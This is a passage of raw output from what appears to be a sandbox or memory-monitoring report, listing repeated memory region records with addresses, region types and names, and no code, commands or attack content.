monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16741 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16758 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16764 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16767 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16768 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16769 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16776 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16777 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16795 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16796 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16800 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16801 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16802 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16803 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16814 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16820 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16821 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16825 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16826 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16827 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16828 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16829 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16830 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16831 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16832 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16833 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16834 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16835 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16836 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16837 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16838 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16839 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16840 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16841 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16842 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16843 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16844 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16845 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16846 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16847 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16848 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16849 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16850 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16851 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16853 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16859 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16864 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16877 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16878 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16880 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16881 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16882 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16883 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16884 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16885 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16886 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16887 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16888 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16889 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16890 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16891 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16892 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16893 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16894 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16895 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16896 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16897 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16898 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16899 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16900 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16901 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16902 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16903 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16904 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16905 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16909 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16910 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16912 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16917 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16918 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16919 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16920 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16921 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16922 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16923 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16924 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16925 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = 